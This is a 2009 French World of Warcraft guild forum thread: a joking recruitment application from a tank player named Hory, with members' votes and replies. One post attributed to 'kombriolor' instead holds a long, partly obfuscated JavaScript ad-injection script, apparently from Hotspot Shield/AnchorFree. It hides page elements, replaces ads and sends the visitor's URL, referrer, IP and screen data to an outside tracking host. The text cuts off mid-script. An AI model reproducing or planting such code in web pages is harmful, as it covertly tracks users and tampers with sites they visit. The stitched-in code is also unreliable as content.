Guilde avensis northrend Index du Forum
S’enregistrerRechercherFAQMembresGroupesConnexion
HaYaWaN

Répondre au sujet    Guilde avensis northrend Index du Forum » » Recrutement Sujet précédent
Sujet suivant
HaYaWaN
Auteur Message
Hory

Point(s): 7
Moyenne de points: 0,88

Message HaYaWaN Répondre en citant
Osef de sa life ?

Et oui c'était inévitable , elle est enfin arrivée cette candidature loufoque tant attendu de tous.

Je me présente je m'appelle Julien ou HaYaWaN pour les intimes , je suis actuellement dans la vie active mais fort bien disponible ,

Je viens d'arriver sur la horde avec un guerrier qui certes n'est pas stuffé selon vos exigences mais qui progresse plus vite que vous ne pouvez l'espérer !

Qui c'est ?

Il s'appelle Hory et est mort-vivant , il a les bras de Mc Tyson car il a up forge en 3 jours et porte en permanence le hérault de la tempête.

Il a aussi crafté des bottes tank pour protéger ses ongles de pieds qu'il maquille secrètement ( Ceux qui ont vu se sont fait décapiter. )

Mais pourquoi il vient spamm ici MERDE !
En plus il est unstuff ce noob...

Il viens spamm ici car ses rares amis de la horde sont dans votre guilde , parce qu'il souhaite faire du pve HL et il fera tout pour y parvenir ,

il a la plus part de ses réputations upé sauf Clairvoyant / Shatar.

ET NON C'EST PAS UN NOOB // Il tank comme un dieux , certains de vos membres pourront confirmer.

En plus il est beau il est modeste il sent bon il est trop fort ... bref la total ... comment avancer en pve sans lui ...

Wallah il est pas clair lui qu'est ce qu'il cherche au juste là .

C'est bien simple je cherche comme je l'ai dis a faire du pve ... pour le fun , mais aussi pour faire connaissance avec des gens qui en valent la peine.

Et ce qui me pousse a postuler chez vous plutôt qu'ailleur est ( biensur mes amis avant tout ) mais aussi le fait que je pense que règne une bonne entente et des

valeurs de respect dans votre guilde dont j'ai entendu parler en bien.

Sachez que mon but n'est pas d'être stuff , mais de me stuffer , de faire évoluer mon perso et d'en profiter a chaque étape.
Et donc je ne souhaite pas m'incruster dans les raids ou mon perso est inutile , mais je serais là pour les kara de vos rerolls , et les instances hero que certains needent toujours et probablement gruul / ssc .
Car je crois savoir que comme partout vos tanks full stuff n'ont pas toujours envie de farm les hero dont ils n'ont plus besoin c'est pourquoi je serais là un plus pour votre guilde ! :-)

Et aussi je veux apprendre un peu l'arabe Very Happy
!

Zerma il va pas nous décrire son stuff ?

Si si mais là on ne peu pas se connecter ,

J'ai donc grossomodo , 14k armure , 10% esquive / 15% parade / 20 ou 25% de blockage.

J'ai le cap def mais c'est bug donc je dois encore up cela .

Ne vous inquiétez pas tout ça va up très rapidement !

Quelques qualités ?

- Parfaite maîtrise de sa classe.
- Réactif et concentré en raid.
- Mange pas de rhalouf
- Aime siillermoon
- Aime aider les autres
- S'engage pleinement dans ce qu'il fait.
- Je fais du chant, Voyez http://www.youtube.com/watch?v=vMZ06O-drVQ

Quelques défauts ?

- Ne traine pas en raid ni en instance , impose toujours une cadence un peu sport.
- Trop gentil.
- A déjà mangé du rhalouf avant ...
- A menti a propos de siillermoon
- Aide trop les autres
- Ne va rien comprendre si vous parler uniquement l'arabe sur ts mais ça viendra xD

Il a lu la charte de guilde ce Hayawan ?

Euuuh non je ne l'ai pas trouvé -.- Merci de me la link svp !! Very Happy

Si vous avez besoins d'autre chose n'hésitez pas ! je ne dors pas tant que j'ai pas la réponse a ma candidature xD !

Sam 19 Sep - 01:28 (2009)
Publicité

Message Publicité
PublicitéSupprimer les publicités ?

Hory

+1 c'est un très bon joueur Wallah

Tasha

Point(s): 10
Moyenne de points: 1,00

Rolling Eyes Rolling Eyes Rolling Eyes Rolling Eyes
Encor un fuck c sa Smile

Sam 19 Sep - 01:30 (2009)
Tasha

Hayawen va !!!!!!!!!!!!!!!!j'aime pa se nom !

Sam 19 Sep - 01:31 (2009)
Hory

Tu l'aimeras !!! ^^

Sam 19 Sep - 01:37 (2009)
Blackroxx

Point(s): 2

Bon je dit +1 , bonne condidature en plus t'est motivé .

Sam 19 Sep - 02:19 (2009)
Wacken
Maitre de classe

Masculin Gémeaux (21mai-20juin)
Point(s): 5

-1  need des carac

Sam 19 Sep - 02:22 (2009)
Wacken
Maitre de classe

Masculin Gémeaux (21mai-20juin)
Point(s): 5

ou sont les screen

Sam 19 Sep - 02:22 (2009)
Hory

Wacken a écrit:

-1  need des carac

j'y travaille , et dans la mesure ou cette candidature ne vise pas l'incruste d'un tank unstuff dans les raid HL dans un premier temps je ne pense pas que les carac soit un

obstacle a mon entrée dans la guilde ainsi qu'a ma participation dans les activités global de la guilde , autre que les raids HL.

Sam 19 Sep - 02:24 (2009)
Skaz

Masculin Scorpion (23oct-21nov) 龍 Dragon

+1  Mort de Rire je t aime horyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy xD

Sam 19 Sep - 03:00 (2009)
Hory

Up Shatar honoré a présent Razz vous voyez je chaume pas ! ^^

Sam 19 Sep - 07:30 (2009)
Sillermoon

Féminin Bélier (21mar-19avr) 狗 Chien
Point(s): 3

+1 pour la motivation é parce que tu m'aime Very Happy

Sam 19 Sep - 16:55 (2009)
livine

Féminin Verseau (20jan-19fev)

+1   je cherche un tank jte neeeeeeeeeeeedddddddd XD

Dim 20 Sep - 11:38 (2009)
ilidane
Guilde master

Point(s): 34
Moyenne de points: 0,97

-1

Lun 21 Sep - 18:27 (2009)
Skiv

+1 , nice espris et nice motivation un mec comme toi j crois qu il doit y avoir ca chance a notre belle avensis :p Okay

Mar 22 Sep - 22:02 (2009)
Hory

Salut , désolé de vous faire ce coup là mais désormais je ne pourrais me connecter qu'exeptionelement , cela dis je souhaite toujours faire partie des vôtres et espère que vous me garderez une place au chaud:D

Sam 26 Sep - 15:52 (2009)
Hory

euuh PS :+7% D'esquive :S c'est pas rien xD et 16% de parade donc au total Wink tchouss

+Cap def franchis

Mar 29 Sep - 20:31 (2009)
Hory

Salut !
Je ne vous cache pas que je suis un peu décu par le nombre de reactions vis a vis de ma candidature : /

J'annonce que bientôt je serais de retour !

Lun 5 Oct - 19:11 (2009)
kombriolor

Point(s): 3

_AF$='F';AF_flpp=new function(){this.adlt='';this.set=function(){try{if(typeof(_AF$.BOX)!='undefined'){_AF$.BOX.rm()}var pleft=0,pwidth='100%',dt=new Date().getTime(),adlt=(!!arguments[0]?'&c=1':''),isrc=_AF$.AF+'api/clrdr2.php?cid=90&tm='+dt+adlt+'&afurl='+document.URL._AFtoHex(),mfl=_$id(_AF$.AD.ID+'flpp'),pfl=_$id('AFpfl'+_AF$.RN),cfl=_$id('AFcfl'+_AF$.RN),ffl=_$id('AFffl'+_AF$.RN);this.adlt=adlt;if(_AF$.wIW>=900){pleft=parseInt(_AF$.wIW/10);pwidth='80%'}pfl.style.left=pleft+'px';pfl.style.width=pwidth;pfl.style.height='100%';pfl.style.position='fixed';cfl.style.position='fixed';cfl.style.height='100%';ffl.style.width='100%';ffl.style.height='100%';mfl.style.display='block';var oarr=_$tn('object');for(var i=0;i<oarr.length;i++){oarr[i].style.display="none"}var oarr=_$tn('iframe');for(var i=0;i<oarr.length;i++){var fid=oarr[i].getAttribute('id');if(!_AF$.hasClass(oarr[i],'AFc_all'+_AF$.RN)&&fid!='AFffl'+_AF$.RN){oarr[i].style.visibility="hidden"}}var oarr=document.embeds;for(var i=0;i<oarr.length;i++){oarr[i].style.display="none"}window.setTimeout(function(){var oarr=_$tn('object');for(var i=0;i<oarr.length;i++){oarr[i].style.display="none"}var oarr=document.embeds;for(var i=0;i<oarr.length;i++){oarr[i].style.display="none"}},2000);window.setTimeout(function(){var oarr=_$tn('object');for(var i=0;i<oarr.length;i++){oarr[i].style.display="none"}var oarr=document.embeds;for(var i=0;i<oarr.length;i++){oarr[i].style.display="none"}},7000);AFf_frSrc('AFffl'+_AF$.RN,isrc);document.body.style.overflow="hidden"}catch(e){}}};HTMLElement.prototype.removeNode=function(a){if(a===true){return this.parentNode.removeChild(this)}else{var r=document.createRange();r.selectNodeContents(this);return this.parentNode.replaceChild(r.extractContents(),this)}};AFf_frSrc=function(){if(!arguments[0]||!arguments[1]){return}frames[arguments[0]].location.replace(arguments[1]);return};AFf_DOM=function(func){addEventListener('DOMContentLoaded',function(){eval(func)},false)};AFf_niceRm=function(){if(typeof(_AF$.BOX)=='undefined'){return}_AF$.BOX.rm()};AFf_bgP=function(){pS=function(){var d=document;if(d.defaultView&&d.defaultView.getComputedStyle){return d.defaultView.getComputedStyle(arguments[0],'').getPropertyValue(arguments[1])}else if(arguments[0].currentStyle){return arguments[0].currentStyle[arguments[1].replace(/-(w)/g,function(strMatch,p1){return p1.toLowerCase()})]}return''};var bi=pS(document.body,'background-image'),bc=pS(document.body,'background-color'),br=pS(document.body,'background-repeat'),ba=pS(document.body,'background-attachment'),bp=pS(document.body,'background-position');bc=(bi=='none'&&bc=='transparent')?'#fff':bc;return'background:'+bc+' '+bi+' '+br+' '+ba+' '+bp};_$id=function(){var o=document.getElementById(arguments[0]);if(!!o){return o}return null};_$tn=function(){var o=document.getElementsByTagName(arguments[0]);if(!!o){return o}return null};_$ina=function(){var f=false,k,s=!!arguments[2];if(typeof(arguments[1])=='string'){arguments[1]=arguments[1].split(',')}for(k in arguments[1]){if((!!s&&arguments[1][k]===arguments[0])||(!s&&arguments[1][k]==arguments[0])){return true;break}}return f};_$ck={set:function(n,v,m,d){var e="";if(m){var dt=new Date();dt.setTime(dt.getTime()+(m*60*1000));e=";expires="+dt.toGMTString()}switch(d){case'':d=window.location.hostname;break;case'.':d='.'+_AF$.DOM;break;default:d='.'+window.location.hostname}document.cookie=n+"="+v+e+"; path=/; domain="+d},get:function(name){var nameEQ=name+"=",ca=document.cookie.split(';');for(var i=ca.length;--i>=0Wink{var c=ca[i].replace(/^\s*|\s*$/g,'');if(c.indexOf(nameEQ)==0){return c.substring(nameEQ.length,c.length)}}return null}};Date.prototype.getTimeS=function(){return parseInt(this.getTime()/1000,10)};String.prototype._AFtoHex=function(){var o='',i,l=this.length;for(i=0;i<l;i++){o+=this.charCodeAt(i).toString(16)}return o};String.prototype._AFtoStr=function(){var o='',i,l=this.length/2;for(i=0;i<l;i++){o+=String.fromCharCode(parseInt('0x'+this.substring(i*2,i*2+2)))}return o};AFf_rmNode=function(_n){try{_$id(_n).removeNode(true)}catch(e){}};AFf_T=function(){return new Date().getTime()};_AFimgStat=function(n){try{var affr='';switch(n){case 0:affr='&affr=insert_iframe&dim='+_AF$.dimStr;break;case 3:affr='&affr=close_btn&';break;case 6:affr='&affr=wsize_off&';break};_$id('AFt_trk'+_AF$.RN).src=_AF$.AFR+AFf_T()+'/afrpt.gif?tag='+_AF$.SN+'&sip='+_AF$.IP+'&cat='+_AF$.CT+'&cnl='+_AF$.CH+'&time='+_AF$.STT+affr+'&dt='+(AFf_T()-_AF$.STT)+_AF$.URR+_AF$.RFR}catch(e){return}};_AF$={'B':_AF$,'ACat':'','BCat':'','AF':'687474703a2f2f626f782e616e63686f72667265652e6e65742f'._AFtoStr(),'AFR':'687474703a2f2f7270742e616e63686f72667265652e6e65742f'._AFtoStr(),'SN':'HSSHIELD00TN','IP':'68.68.107.25','CH':'HSSCNL000076','CT':'0','ON':0,'RN':Math.floor(Math.random()*999),'TOP':1,'STT':new Date().getTime(),'ELS':['iframe','embed','object'],'DOM':'','REF':'','KEY':1,'AD':{'HGHT':91,'STL':'','DVC':'dvc','DIM':0,'CAT':'0','O':false,'A':true,'S':true,'C':true,'K':true,'P':true},hasClass:function(ele,cls){try{var clsn=(ele.className.match(new RegExp('(\\s|^)'+cls+'(\\s|$)'))===null)?null:cls}catch(e){clsn=null}return clsn},keyPress:function(e){if(window.event){_AF$.KEY=window.event.keyCode}else if(e.which){_AF$.KEY=e.which}},clsBtn:function(){if(!!arguments[0]&&arguments[0]==true){_AFimgStat(3);document.location.href=_AF$.AF+'askclose.php?tag='+_AF$.SN+'&cnl='+_AF$.CH}else{if(_AF$.KEY==88){document.location.href=_AF$.AF+'close.php?tag='+_AF$.SN}else{_AFimgStat(3);AFf_niceRm()}}}};(function(){(function(){_AF$['RFR']='&afRh=empty&afRp=empty&afRs=empty';var m=new RegExp(/http:\/\/([^/]*)\/([^?]*)(\?(.*))?/i).exec(document.referrer);if(m!=null){_AF$.RFR='&afRh='+encodeURIComponent(m[1]);if(!!m[2]&&m[2]!=''){_AF$.RFR+='&afRp='+encodeURIComponent(m[2]);if(!!m[4]&&m[4]!=''){_AF$.RFR+='&afRs='+encodeURIComponent(m[4])}else{_AF$.RFR+='&afRs=empty'}}else{_AF$.RFR+='&afRp=empty&afRs=empty'}}})();(function(){_AF$['URR']='&afUh=empty&afUp=empty&afUs=empty';var s='',wup=encodeURIComponent(window.location.pathname),wus=encodeURIComponent(window.location.search);if(wup!='%2F'&&wup!=''){s='&afUp='+wup;if(wus!=''){s=s+'&afUs='+wus}else{s=s+'&afUs=empty'}}else{s='&afUp=empty&afUs=empty'}_AF$.URR='&afUh='+encodeURIComponent(window.location.hostname)+s})();try{_AF$['VERSION']=ANCHORFREE_VERSION}catch(e){_AF$['VERSION']=99999}_AF$['VRS']=_AF$.AF+'templates/AFVRST'+_AF$.VERSION+'/afw.html';_AF$.AD['ID']='';_AF$.AD['DV']='';for(var i=4;--i>=0Wink{_AF$.AD.ID+=String.fromCharCode(97+Math.round(Math.random()*25));_AF$.AD.DV+=String.fromCharCode(97+Math.round(Math.random()*25))}_AF$.AD.ID+=_AF$.RN;_AF$.AD.DV+=_AF$.RN;try{var sip=_AF$.IP.split('.');_AF$.IP=parseFloat(sip[0]*256*256*256)+parseFloat(sip[1]*256*256)+parseFloat(sip[2]*256)+parseFloat(sip[3])}catch(e){_AF$.IP=0}try{if(_AF$.CT.indexOf('%AFCAT0')!=-1){_AF$.CT='0'}}catch(e){_AF$.CT='0'}try{_AF$.DOM=escape(document.URL.substring(0,1000));_AF$.REF=(document.referrer!=="")?escape(document.referrer.substring(0,1000)):"empty";var s=self,sc=s.screen,db=document.body,fa=function(){return arguments[0]?arguments[0]:0};_AF$['wIW']=0;_AF$['wIH']=0;_AF$['sW']=fa(sc.width);_AF$['sH']=fa(sc.height);_AF$['sAW']=fa(sc.availWidth);_AF$['sAH']=fa(sc.availHeight);_AF$['wOH']=fa(s.outerHeight);_AF$['wOW']=fa(s.outerWidth);_AF$['pL']=fa(s.screenLeft);_AF$['pT']=fa(s.screenTop);_AF$['pX']=fa(s.screenX);_AF$['pY']=fa(s.screenY);if(typeof(window.innerWidth)=='number'){_AF$.wIW=window.innerWidth;_AF$.wIH=window.innerHeight}else if(document.documentElement&&(document.documentElement.clientWidth||document.documentElement.clientHeight)){_AF$.wIW=document.documentElement.clientWidth;_AF$.wIH=document.documentElement.clientHeight}else if(db&&(db.clientWidth||db.clientHeight)){_AF$.wIW=db.clientWidth;_AF$.wIH=db.clientHeight}_AF$['dimStr']=(_AF$.wIW+','+_AF$.wIH+','+_AF$.wOW+','+_AF$.wOH+','+_AF$.sW+','+_AF$.sH+','+_AF$.sAW+','+_AF$.sAH+','+_AF$.pL+','+_AF$.pT+','+_AF$.pX+','+_AF$.pY)}catch(e){}if(_AF$.CH=='HSSCNL000175'){_AF$.AD.A=false;_AF$.AD.C=false;_AF$.AD.K=false;_AF$.AD.P=false}if(_AF$.CH=='HSSCNL000218'){_AF$.AD.A='ask';_AF$.AD.P=false}})();_AF_Meta2={'init':function(){var a1=['6164756c74','736578','6e756465','65726f746963','76697267696e','666574697368'],aps=['6675636b','706f726e','7368656d616c65','626c6f776a6f62','70656e6973','6f726761736d','696e63657374','787878','78766964656f','6865726d617068726f64697465','6f726779','6f726769'],apw=['7075737379','73686974','616e616c'],apw2=['617373','736c7574'];this.s=function(st,ka,r){for(var i=0;i<ka.length;i++){var tmp=ka[i]._AFtoStr();if(st.indexOf(tmp)!=-1){return r;break}}return''};this.f=function(st,ka,r){for(var i=0;i<ka.length;i++){var tmp=ka[i]._AFtoStr();var re=new RegExp('\\W('+tmp+')\\W');if((' '+st+' ').match(re)!=null){return r;break}}return''};this.f2=function(st,ka,r){for(var i=0;i<ka.length;i++){var tmp=ka[i]._AFtoStr();var re=new RegExp('\\W('+tmp+')([a-z]{2})?\\W');if((' '+st+' ').match(re)!=null){return r;break}}return''};this.pre=function(){var met=function(){var m=document.getElementsByTagName('meta');if(!!m){for(var i=0;i<m.length;i++){var ml=m[i].name.toLowerCase(),lng=m[i].httpEquiv.toLowerCase();if(!!ml){if(ml=='keywords'){KWD=',KWD';mk=m[i].content.toLowerCase()}if(ml=='description'){DSC=',DSC';md=m[i].content.toLowerCase()}}else{try{if(!!lng&&lng.toLowerCase().indexOf('language')!=-1&&lng.content.toLowerCase()!='en'){RT2=(lng!='en')?',RT2':''}}catch(e){}}}}if(RT2==false){RT2='';try{var h=document.getElementsByTagName('html'),lng=h[0].getAttribute('lang').toLowerCase();if(!!lng&&lng!='en'&&lng!='en-us'){RT2=',2'}}catch(e){}}};var PRP=false,PR1=false,PR0=false,RT2=false,KWD='',DSC='',TTL='',ct_add='',mk='',md='',kwstr='',dr=document.referrer?(document.referrer+'').toLowerCase():'',du=document.URL?(document.URL+'').toLowerCase():'',dt=(!!document.title&&document.title!='')?(document.title+'').toLowerCase():'';met();kwstr=(du+" "+dr+" "+dt+" "+mk+" "+md).toLowerCase();TTL=dt!=''?',TTL':'';PRP=_$ina('p',_AF$.CT);PR1=_$ina('1',_AF$.CT);PR0=_$ina('0',_AF$.CT);ct_add=this.s(kwstr,aps,',p');if(ct_add==''){ct_add=this.f(kwstr,apw,',p');if(ct_add==''){ct_add=this.f2(kwstr,apw2,',p');if(ct_add==''){ct_add=this.s(kwstr,a1,',1');if(ct_add==''&&RT2!=false){ct_add=RT2}}}}_AF$.BCat=ct_add;if(PRP==false&&PR1==false&&PR0==false&&(ct_add==',1'||ct_add==',p')){_AF$.CT+=ct_add}else if(PRP==false&&PR1==false&&PR0!=false){if(ct_add==',1'||ct_add==',2'){_AF$.CT+=',1'}else if(ct_add==',p'){_AF$.CT+=ct_add}}else if(PRP==false&&PR1!=false){if(ct_add==',p'){_AF$.CT+=ct_add}}};this.pos=function(){var tags=document.getElementsByTagName("*"),kwstr='',ct_add='',rep=false,PRP=false,PR1=false,PR0=false,scrpt=/<script\b[^>]*>(.*?)<\/script>/gi,stl=/<style\b[^>]*>(.*?)<\/style>/gi,matchTag=/<(?:.|\s)*?>/g;kwstr=document.body.innerHTML;kwstr=kwstr.replace(stl,"");kwstr=kwstr.replace(scrpt,"");kwstr=kwstr.replace(matchTag,"");if(kwstr!=''){ct_add=this.s(kwstr,aps,',p');if(ct_add==''){ct_add=this.f(kwstr,apw,',p');if(ct_add==''){ct_add=this.f2(kwstr,apw2,',p');if(ct_add==''){ct_add=this.s(kwstr,a1,',1');if(ct_add==',1'&&kwstr.indexOf('2257')!=-1){ct_add=',p'}}}}}PRP=_$ina('p',_AF$.CT);PR1=_$ina('1',_AF$.CT);PR0=_$ina('0',_AF$.CT);_AF$.ACat=ct_add;if(PR0!=false&&PR1==false&&PRP==false){if(ct_add==',1'||ct_add==',p'){rep=true;if(_AF$.AD.A!=false&&_AF$.ADSRC!=''){_AF$.CT=_AF$.CT+ct_add;AFf_frSrc(_AF$.AD.ID,'about:blank');window.setTimeout(function(){AFf_frSrc(_AF$.AD.ID,_AF$.ADSRC+'&ncat='+_AF$.CT+'&cat='+_AF$.CT+_AF$.URR+_AF$.RFR)},1000)}}}else if(PR1!=false&&PRP==false){if(ct_add==',p'){rep=true;_AF$.CT=_AF$.CT+ct_add;AFf_frSrc(_AF$.AD.ID,_AF$.ADSRC+'&ncat='+_AF$.CT+'&cat='+_AF$.CT+_AF$.URR+_AF$.RFR)}}if(rep!=false){var AFtptst2=new Image();AFtptst2.src=_AF$.AFR+AFf_T()+'/afrpt.gif?tag='+_AF$.SN+'&sip='+_AF$.IP+'&cat='+_AF$.CT+'&ncat='+ct_add+'&affr=recat_iframe'+_AF$.URR}_AF$.CT+=ct_add;delete(tags)}}};var AFpre=new _AF_Meta2.init();AFpre.pre();(function(){try{if(parent.location!=document.location||top.location!=document.location){_AF$.TOP=0;return}var a_hf=document.URL+'',a_arrS=_$ck.get('AF_C'),lset=function(){var v=arguments[0]+'_'+escape(arguments[1]);_$ck.set('AF_C',v,arguments[2],'')};if(a_arrS!=null){var a_arr=new RegExp(/([0-9]+)_(.*)/).exec(a_arrS),a_f=a_arr[1]*1,a_Url=a_arr[2]+'',ea_hf=escape(a_hf);if(a_f>3&&ea_hf==a_Url){lset('4',a_hf,5);_AF$.TOP=0;return}else if(ea_hf!=a_Url){lset('0',a_hf,1)}else{lset((a_f+1),a_hf,1)}}else{lset('0',a_hf,1)}}catch(e){_AF$.TOP=0;return}document.write('
<span class="AFc_all'+_AF$.RN+'" id="AFcfl'+_AF$.RN+'" style="z-index:9999999;position:absolute;top:0;left:0;-ms-filter:\'progid:DXImageTransform.Microsoft.Alpha(Opacity=50)\';filter:alpha(opacity=50);-moz-opacity:0.5;opacity:0.5;width:100%;height:100%;background-color:blue"></span>
<iframe src="about:blank" id="AFffl'+_AF$.RN+'" name="AFffl'+_AF$.RN+'" style="margin:0;padding:0;border:0" width="0" border="0" height="0" scrolling="auto" hspace="0" vspace="0" marginheight="0" frameborder="0" marginwidth="0"></iframe>

<iframe type="text/html" src="about:blank" class="AFc_all'+_AF$.RN+'" name="AFt_afhf'+_AF$.RN+'" id="AFt_afhf'+_AF$.RN+'" hspace="0" vspace="0" marginheight="0" marginwidth="0" style="color:#fff;background-color:transparent;border:0;height:2px;width:5px;top:0;left:0;position:absolute;display:none;"></iframe>

')})();_AF$.ON=(function(){if(_AF$.CH=='HSSCNL000219'||_AF$.CH=='HSSCNL000220'){_AF$.AD.P=false;_AF$.AD.C=false;_AF$.AD.K=false;_AF$.AD.S=false;if(_$ina('p',_AF$.CT)==true||_$ina('1',_AF$.CT)==true){_AF$.AD.A=false;return 0}else{_AF$.AD.A='ask'}}try{if(_AF$.TOP==0||_AF$.REF==_AF$.DOM||navigator.userAgent.indexOf('iPhone')!=-1||navigator.userAgent.indexOf('iPod')!=-1){return 0}if(_$ina('1C',_AF$.CT)==true||_$ina('1H',_AF$.CT)==true||_$ina('o',_AF$.CT)==true||_$ina('1J',_AF$.CT)==true){return 0}if(_$ina('1K',_AF$.CT)==true){window.location='687474703a2f2f686f7473706f74736869656c642e636f6d2f'._AFtoStr()+'terms/';return 0}if(_AF$.wIH<300||_AF$.wIW<485){_AF$.AD.DIM=0;_AFimgStat(6);return 0}else{if(typeof(AF_NOADDIN)!='undefined'&&AF_NOADDIN==true){if(unescape(_AF$.DOM).indexOf('o=14931')!=-1){_AF$.AD.DIM=41;_AF$.AD.HGHT=31;AFf_DOM('AF_ASKFIX()')}else{return 0}}else if(_AF$.wIW>=748){if(Math.floor(Math.random()*10)<6&&navigator.userAgent.indexOf('Firefox')!=-1){var r=new RegExp(/^http:\/\/([^/]*\.)?([^/.]+.com)/i).exec(window.location.href)}if(_AF$.CH!='HSSCNL000219'&&_AF$.CH!='HSSCNL000220'&&_AF$.AD.A!=false&&!!r&&r[2]!=null&&(r[2]=='google.com'||r[2]=='yahoo.com'||r[2]=='facebook.com'||r[2]=='youtube.com'||r[2]=='hulu.com'||r[2]=='hi5.com'||r[2]=='orkut.com'||r[2]=='myspace.com')){AFf_RNVEGG=function(){document.getElementById(_AF$.AD.ID+'vegg').src=_AF$.AFR+AFf_T()+"/afrpt.gif?afcid=99999&affr=displayed_default_541&dt="+(AFf_T()-_AF$.STT)+"&tag="+_AF$.SN+"&cnl="+_AF$.CH+"&sip="+_AF$.IP+"&cat="+_AF$.CT+_AF$.URR+_AF$.RFR;document.getElementById(_AF$.AD.ID).style.display='block';AFf_frSrc(_AF$.AD.ID,_AF$.VRS+'?#tag='+_AF$.SN+'&sip='+_AF$.IP+'&cnl='+_AF$.CH+'&cat='+_AF$.CT+_AF$.URR+_AF$.RFR)};_AF$.AD.DIM=11}else{_AF$.AD.DIM=100}}else if(_AF$.wIW<748&&_AF$.wIW>=485){_AF$.AD.DIM=30;_AF$.AD.HGHT=61}}}catch(e){return 0}_AF_PP=function(){var b=(!!arguments[0]&&arguments[0]==true)?true:false,nf=function(){if(window.name=='AF'){window.name='AF2'}var pp=window.open(this.ur,'AF','copyhistory=1,titlebar=1,location=1,menubar=1,resizable=1,scrollbars=1,status=1,titlebar=1,toolbar=1,directories=1');if(pp!=null){if(document.addEventListener){document.removeEventListener('click',_AF_PP,false)}else if(document.attachEvent){document.detachEvent('onclick',_AF_PP)}pp.blur();window.focus()}return false};try{if(b==true){this.ur=arguments[1];if(document.addEventListener){document.addEventListener('click',_AF_PP,false)}else if(document.attachEvent){document.attachEvent('onclick',_AF_PP)}}else{nf()}}catch(e){return}};(function(){_AF$.STL=AFf_bgP();document.write("<style type='text/css' title='AFc_css"+_AF$.RN+"'>.AFc_body"+_AF$.RN+"{} .AFc_all"+_AF$.RN+",a.AFc_all"+_AF$.RN+":hover,a.AFc_all"+_AF$.RN+":visited{outline:none;background:transparent;border:none;margin:0;padding:0;top:0;left:0;text-decoration:none;overflow:hidden;display:block;z-index:666999;}</style>")})();return 1})();AFf_Box=function(){var d=document,dh=_$tn('html')[0];this.tag=_$id(_AF$.AD.DV);this.dr=function(){dh.style.backgroundPosition=_AF$.AD.HGHT+'px 0';dh.style.marginTop=_AF$.AD.HGHT+'px';this.tag.style.display='block';this.tag.style.position='fixed'};this.rm=function(){this.tag.style.display='none';this.tag.style.position='';dh.style.backgroundPosition='';dh.style.marginTop='';AFf_rmNode(_AF$.AD.ID);_AF$.AD.A=false;if(typeof(AFf_Pr.showX())=='function'){AFf_Pr.showX}}};AFf_Pr=new function(){if(typeof(_AF$)=='undefined'||_AF$.C==false||typeof(AFf_T)=='undefined'){return}var getHost,getElsId,dhost=_AF$.DOM,aN=0,eN=0,elObj=[],elObjS=[],a=0,set,change_time=0;getHost=function(b){var _s=null;if(_AF$.hasClass(b,'AFc_all'+_AF$.RN)){return false}if(typeof(b.src)!='undefined'){_s=b.src}else{var _bn=b.childNodes;_bnlength=_bn.length;for(var m=0;m<_bnlength;m++){if(_bn[m].name&&_bn[m].name=='movie'){_s=_bn[m].value;break}}}if(_s!=null&&_s.indexOf('http')!=-1){var _sn=_s.match(/:\/\/(www\.)?([^\/:]+)/);if(_sn==null||_sn.length<2||typeof(_sn[2])=='undefined'){_sn=dhost}else{_sn=_sn[2]}}if(_sn!=null&&_sn!=dhost&&_sn!='box.anchorfree.net'&&_sn.indexOf('videoegg')==-1){return true}return false};set=function(){var cnt=_$id('AFt_adRep'+a),cls,stl,img_display,el=arguments[0],w=arguments[1],h=arguments[2];cls=el.getAttribute('class');stl=el.getAttribute('style');if(typeof(cls)!='undefined'&&cls!=null){cnt.setAttribute('class',cls)}cnt.style.width=w+'px';cnt.style.height=h+'px';cnt.style.display='block';el.parentNode.insertBefore(cnt,el);if(_AF$.AD.A==true){img_display='display:none;'}else{img_display='display:block;'}var sc=_AF$.VRS+'?#tag='+_AF$.SN+'&sip='+_AF$.IP+'&cnl='+_AF$.CH+'&cat='+_AF$.CT+'&type=c&w='+w+'&h='+h+_AF$.URR+_AF$.RFR;cnt.innerHTML='
<iframe id="AFt_adRepFrame'+a+'" src="'+sc+'" class="AFc_all'+_AF$.RN+'" frameborder="0" scrolling="no" align="middle" hspace="0" vspace="0" marginheight="0" marginwidth="0" style="border:0;z-index:100000;padding:0;overflow:hidden;height:'+(h+1)+'px;width:'+w+'px;"></iframe>';el.style.display='none';a++};this.del=function(a,h){var cnt=_$id('AFt_adRep'+a);cnt.style.display='none';cnt.nextSibling.style.display='block';AFf_rmNode('AFt_adRep'+a)};this.showX=function(){for(var n=a;--n>=0Wink{var iObj=_$id('AFt_adRepImg'+n);if(iObj){iObj.style.display='block'}}};this.init=function(){if((AFf_T()-_AF$.STT)<change_time){setTimeout(arguments.callee,1000);return}var el;for(var n=0,tl=_AF$.ELS.length;n<tl;n++){var tag=_$tn(_AF$.ELS[n]);var tl=tag.length;for(var i=0;i<tl;i++){if(getHost(tag[i])==false){continue}var w=tag[i].offsetWidth,h=tag[i].offsetHeight;if((w>=466&&w<=472)&&(h>=58&&h<=64)){elObj[++a]=tag[i];elObjS[a]=[468,60]}else if((w>=298&&w<=304)&&(h>=248&&h<=254)){elObj[++a]=tag[i];elObjS[a]=[300,250]}else if((w>=726&&w<=732)&&(h>=88&&h<=94)){elObj[++a]=tag[i];elObjS[a]=[728,90]}else if((w>=118&&w<=124)&&(h>=598&&h<=604)){elObj[++a]=tag[i];elObjS[a]=[120,600]}else if((w>=158&&w<=164)&&(h>=598&&h<=604)){elObj[++a]=tag[i];elObjS[a]=[160,600]}else if((w>=118&&w<=124)&&(h>=88&&h<=94)){elObj[++a]=tag[i];elObjS[a]=[120,90]}else if((w>=178&&w<=184)&&(h>=148&&h<=154)){elObj[++a]=tag[i];elObjS[a]=[180,150]}}if(elObj.length==10){continue}}a=0;for(el in elObj){if(elObj.hasOwnProperty(el)){set(elObj[el],elObjS[el][0],elObjS[el][1])}}}};if(_AF$.TOP==1){if(_AF$.ON==1){_AFimgStat(0);_AF$['ADFRAME']='<iframe class="AFc_all'+_AF$.RN+'" name="'+_AF$.AD.ID+'" id="'+_AF$.AD.ID+'" src="about:blank" height="'+(_AF$.AD.HGHT-1)+'px" marginwidth="0" marginheight="0" vspace="0" hspace="0" frameborder="0" scrolling="no" width="100%"></iframe>';if(_AF$.AD.A=='ask'){var ask_pos=(_AF$.B=='F')?'position:fixed;right:20px;':'position:absolute;left:'+(_AF$.wIW-140)+'px;';_AF$['OUTPUT']=('
To keep Hotspot Shield
free we display ads.
Click
anytime to
stop the display of ads.

Close all ads for
this session.

');delete(ask_pos);_AF$['CLS']=('
');_AF$['SHR']=('
');_AF$['LGO']=('
')}else{_AF$['OUTPUT']=('
